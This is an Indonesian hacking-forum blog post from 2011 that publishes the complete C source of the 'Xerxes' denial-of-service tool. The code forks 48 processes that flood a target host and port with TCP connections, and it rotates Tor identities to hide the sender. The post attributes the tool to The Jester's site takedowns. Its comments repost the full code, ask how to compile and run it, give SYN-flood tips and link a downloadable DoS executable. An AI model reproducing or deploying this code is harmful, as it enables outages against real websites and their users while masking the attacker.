Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

DDOS Tools: Xerxes DOS Tools

23 July 2011
Penulis:   · Kategori Artikel: Coding

BINUS HACKER Binus Hacker Is Not Criminal Banner





Greeting Guest, Anonymous & BinusHacker Family

Berikut ini adalah source code Xerxes DOS (DDOS Tools) yang digunakan untuk melakukan DOS terhadap server-server. Digunakan oleh The Jester untuk takedown situs-situs, langsung aja ini source codenya:

/* XerXes – Most powerful dos tool – THN (http://pastebin.com/aWZMbjSU) */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int make_socket(char *host, char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r;
//    fprintf(stderr, “[Connecting -> %s:%s\n", host, port);
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
        exit(0);
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
        if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
            continue;
        }
        if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
            close(sock);
            continue;
        }
        break;
    }
    if(p == NULL) {
        if(servinfo)
            freeaddrinfo(servinfo);
        fprintf(stderr, "No connection could be made\n");
        exit(0);
    }
    if(servinfo)
        freeaddrinfo(servinfo);
    fprintf(stderr, "[Connected -> %s:%s]\n”, host, port);
    return sock;
}

void broke(int s) {
    // do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;
    for(x=0; x!= CONNECTIONS; x++)
        sockets[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
        for(x=0; x != CONNECTIONS; x++) {
            if(sockets[x] == 0)
                sockets[x] = make_socket(host, port);
            r=write(sockets[x], “\0″, 1);
            if(r == -1) {
                close(sockets[x]);
                sockets[x] = make_socket(host, port);
            } else
//                fprintf(stderr, “Socket[%i->%i] -> %i\n”, x, sockets[x], r);
            fprintf(stderr, “[%i: Voly Sent]\n”, id);
        }
        fprintf(stderr, “[%i: Voly Sent]\n”, id);
        usleep(300000);
    }
}

void cycle_identity() {
    int r;
    int socket = make_socket(“localhost”, “9050″);
    write(socket, “AUTHENTICATE \”\”\n”, 16);
    while(1) {
        r=write(socket, “signal NEWNYM\n\x00″, 16);
        fprintf(stderr, “[%i: cycle_identity -> signal NEWNYM\n", r);
        usleep(300000);
    }
}

int main(int argc, char **argv) {
    int x;
    if(argc !=3)
        cycle_identity();
    for(x=0; x != THREADS; x++) {
        if(fork())
            attack(argv[1], argv[2], x);
        usleep(200000);
    }
    getc(stdin);
    return 0;
}

Video Xerxes Dos

Semoga informasi ini bermanfaat sebagai pembelajaran yang lebih baik.

Ayo kunjungi Forum BinusHacker: http://forum.binushacker.net

BINUS HACKER Binus Hacker Chat and Forum

Komentar

30 Komentar Untuk “DDOS Tools: Xerxes DOS Tools
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. intruder.master pada 23 July 2011 9:40 am

    Ini pake bahasa apa?

    trus cara exenya gmn??
    pake Terminal ato gmn??

  2. or"true pada 25 July 2011 10:28 am

    C:/deldos/8.8\q
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    int make_socket(char *host, char *port) {
    struct addrinfo hints, *servinfo, *p;
    int sock, r;
    // fprintf(stderr, “[Connecting -> %s:%s\n", host, port);
    memset(&hints, 0, sizeof(hints));
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
    fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
    exit(0);
    }
    for(p = servinfo; p != NULL; p = p->ai_next) {
    if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
    continue;
    }
    if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
    close(sock);
    continue;
    }
    break;
    }
    if(p == NULL) {
    if(servinfo)
    freeaddrinfo(servinfo);
    fprintf(stderr, "No connection could be made\n");
    exit(0);
    }
    if(servinfo)
    freeaddrinfo(servinfo);
    fprintf(stderr, "[Connected -> %s:%s]\n”, host, port);
    return sock;
    }
    void broke(int s) {
    // do nothing
    }
    #define CONNECTIONS 8
    #define THREADS 48
    void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;
    for(x=0; x!= CONNECTIONS; x++)
    sockets[x]=0;
    signal(SIGPIPE, &broke);
    while(1) {
    for(x=0; x != CONNECTIONS; x++) {
    if(sockets[x] == 0)
    sockets[x] = make_socket(host, port);
    r=write(sockets[x], “″, 1);
    if(r == -1) {
    close(sockets[x]);
    sockets[x] = make_socket(host, port);
    } else
    // fprintf(stderr, “Socket[%i->%i] -> %i\n”, x, sockets[x], r);
    fprintf(stderr, “[%i: Voly Sent]\n”, id);
    }
    fprintf(stderr, “[%i: Voly Sent]\n”, id);
    usleep(300000);
    }
    }
    void cycle_identity() {
    int r;
    int socket = make_socket(“localhost”, “9050″);
    write(socket, “AUTHENTICATE \”\”\n”, 16);
    while(1) {
    r=write(socket, “signal NEWNYM\n\x00″, 16);
    fprintf(stderr, “[%i: cycle_identity -> signal NEWNYM\n", r);
    usleep(300000);
    }
    }
    int main(int argc, char **argv) {
    int x;
    if(argc !=3)
    cycle_identity();
    for(x=0; x != THREADS; x++) {
    if(fork())
    attack(argv[1], argv[2], x);
    usleep(200000);
    }
    getc(stdin);
    return 0;
    }

  3. dodik pada 25 July 2011 11:13 pm

    nice info kang
    salam kenal..

  4. DDOS Tools: Xerxes DOS Tools | Cara Hack Dan Togelista Hongkong pada 6 August 2011 10:33 am

    [...] #include <string.h> #include <stdint.h> #include <unistd.h> [...] BINUS HACKER Posts Related to DDOS Tools: Xerxes DOS ToolsAnonymous Party AntiSec #OpIndonesiaGreeting [...]

  5. fahri pada 9 August 2011 7:13 am

    cara makenya gimana tuh gan ?

  6. T0XX1C666 pada 16 August 2011 5:33 pm

    gan , itu source codenya ntar di gimanain ? maklum ane masih newbie gan . mohon bimbingan :D

  7. Leo pada 19 August 2011 2:32 am

    ada modul ttg DDOS gx ???

    lw ad Krim lwt Email ya???

    thx!!

  8. Leo pada 19 August 2011 2:36 am

    Email :

    Leo_leonardus@ymail.com

    kirim Ke E-Mail ini ya ???

  9. Gen pada 17 September 2011 5:46 am

    Kk , minta mentahannya langsung dong . bisa kan kk ?

  10. fazri pada 17 September 2011 11:10 am

    kalo ga salah ini bahasa C atau C++ ya?
    tinggal di compile aja ni gan…
    nanti hasilnya jadi “.exe”
    (sotoy) \(^_^)/

  11. eby pada 19 September 2011 6:06 am

    kk minta yg langsung nya dong boleh ga kak ?

  12. eby pada 19 September 2011 6:07 am

    ini terus di apain ? minta yg langsung nya dong kaks

  13. newbieTOOL pada 21 September 2011 6:57 am

    ini pake VB kan

  14. rahmad pada 18 October 2011 11:57 pm

    Seperti bahasa C++ ?

  15. KhOzHoA pada 2 November 2011 5:24 am

    mas… ini make bahasa c atau make bahasa c++ ????

  16. siBudum pada 8 November 2011 9:14 pm

    Kang….library ane kurang kang >_>
    error di Include2nya pada kaga nemu
    @_@
    kasi link nya dunk

  17. rougerdeluffy pada 21 November 2011 10:20 pm

    fungsinya buat apa ddos itu sendiri

  18. ---neXs34m5/[walied] pada 11 December 2011 5:31 am

    DoS HTTP v1.0 by —neXs34m5/[walied] silakan download tool saya di
    http://www.ziddu.com/download/17623607/DoSHTTPv1.0.exe.html

  19. ---neXs34m5/[walied] pada 11 December 2011 5:34 am

    apabila ada pertanyaan silakan kirim pesan di facebook bernama “walied ghali” gambarnya hitam putih

  20. STRYGWR pada 20 December 2011 9:21 am

    ini pake bahasa c gan

  21. Erick pada 31 December 2011 7:52 am

    usahakan video tutornya bis di donlot kang ADMIN … ^_^

  22. Templar pada 14 February 2012 7:56 pm

    xerxes tool yang dipake jester bisa buat windows?? kalo bisa gimana caranya gan :)

  23. BATS pada 24 February 2012 9:22 pm

    sepertinya ini pake C++, maklum, masih baru belajar C++. Tinggal dikompile aja tuh source code

  24. Emil pada 4 May 2012 6:21 am

    gan pas udah saya compile..

    tulisannya “Source File not complete” ,terus gimana tuh ya ?

  25. goblok pada 23 May 2012 8:17 am

    jiahh,, ini mah si admin maen copas doang,, gak jelas gitu…
    dasar lamer

  26. camfroger pada 26 May 2012 12:48 am

    ini gimana gan.. instal d linux.?? trus ini sc d apain..kok gk ada penjelasannya..kalo memang pake linux..mohon tutorial instal sama cara pake nya gan..

  27. xzorax pada 11 June 2012 9:59 am

    mas, mas sekalian….mungkin bole saya bantu jelaskan dikit..ini pake bahasa C sederhana koq, cuma ya smua librarynya itu memang khusus untuk Unix…bias sih diganti untuk windows, hanya saja harus include winsock.h…cuma maenan socket saja…baru dilihat sekilas sih, buka koneksi TCP ke port yg diarah, kemudian kasih NULL aja terus-terusan…mungkin lebih powerful lagi kalau manfaatkan raw packet :)

  28. xzorax pada 11 June 2012 10:02 am

    sekedar saran untuk mas mas, sebaiknya pelajari dulu tentang dunia socket sebelum mencoba untuk buat DDoS…sebenarnya buat DDos gampang koq…tinggal kasih Syn Sent sebanyak2anya…klo hajar ke database sih biasanya jebol juga karena nyangkut semua nanti packetnya gak bisa di close :)

  29. nightmare pada 15 November 2012 9:55 pm

    untuk semua orang yang membaca ini, ini bukan Xerxes, dia bisa menggantikan variabel dan soket URL sebagai link malware sendiri.

    link asli : http://www.lo0.ro/2011/xerxes-source-code-dos-tool-download/

  30. ghulam programmer pada 17 December 2012 12:09 am

    itu make script bahasa c&&c++, untuk file header kita harus buat dulu, jadi dalam script.a harus disisipin source code file header jika tidak, compiler devc++, minggw, visual c++, borland dsb gak akan bisa kompile….

Silahkan Berikan Tanggapan Anda...